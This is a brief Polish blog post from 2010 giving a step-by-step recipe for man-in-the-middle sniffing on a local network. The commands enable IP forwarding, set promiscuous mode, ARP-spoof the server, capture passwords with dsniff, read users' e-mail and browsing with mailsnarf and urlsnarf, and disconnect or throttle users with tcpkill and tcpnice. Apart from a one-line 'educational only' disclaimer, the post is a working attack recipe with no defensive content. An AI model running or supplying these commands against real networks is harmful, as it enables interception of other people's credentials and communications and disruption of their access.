Sniffing w sieciach LAN/WAN

Posted: 23 czerwca 2010 in Uncategorized

Włączamy forwardowanie pakietow:
# echo 1 > /proc/sys/net/ipv4/ip_forward
Wprowadzamy kartę sieciową w tryb nasłuchu pakietow przychodzacych jak i wychodzacych:
ifconfig eth0 promisc
Jeżeli posiadamy „radiówkę” warto ustawić:
arpspoof -i eth0 IP_SERWERA >&/dev/null&
Spowoduje to przechodzenie całego ruchu w sieci przez nasz komputer.

 

Sniffinig:
dsniff -i eth0 -c
Przechwytywanie wiadomości e-mail:
mailsnarf
Przeglądane strony przez użytkowników:
urlsnarf
oraz
tail -f urlsnarf
Zamknięcie połączenia TCP/IP (użytkownik zostanie odłączony od sieci):
tcpkill -i eth0 -5 (NAZWA_HOSTA_KTORY_CHCEMY_ROZLACZYC)
Liczba 5 jest to skala brutalnosci ataku. Jej zakres to <1; 9> Rozsądna wartość to 7 lub 8. Ustawienie wartości 9 może nas odłączyć od sieci.

 

Blokowanie przeglądania stron:
tcpnice -i eth0 -I -n 20 host (IP) i port 80

Wpis jest celowo mocno skrócony. Nie odpowiadam za jakiekolwiek konsekwencje takiego działania. Materiał jest jedynie dla celów edukacyjnych.

Reklamy

Skomentuj

Wprowadź swoje dane lub kliknij jedną z tych ikon, aby się zalogować:

Logo WordPress.com

Komentujesz korzystając z konta WordPress.com. Wyloguj / Zmień )

Zdjęcie z Twittera

Komentujesz korzystając z konta Twitter. Wyloguj / Zmień )

Facebook photo

Komentujesz korzystając z konta Facebook. Wyloguj / Zmień )

Google+ photo

Komentujesz korzystając z konta Google+. Wyloguj / Zmień )

Connecting to %s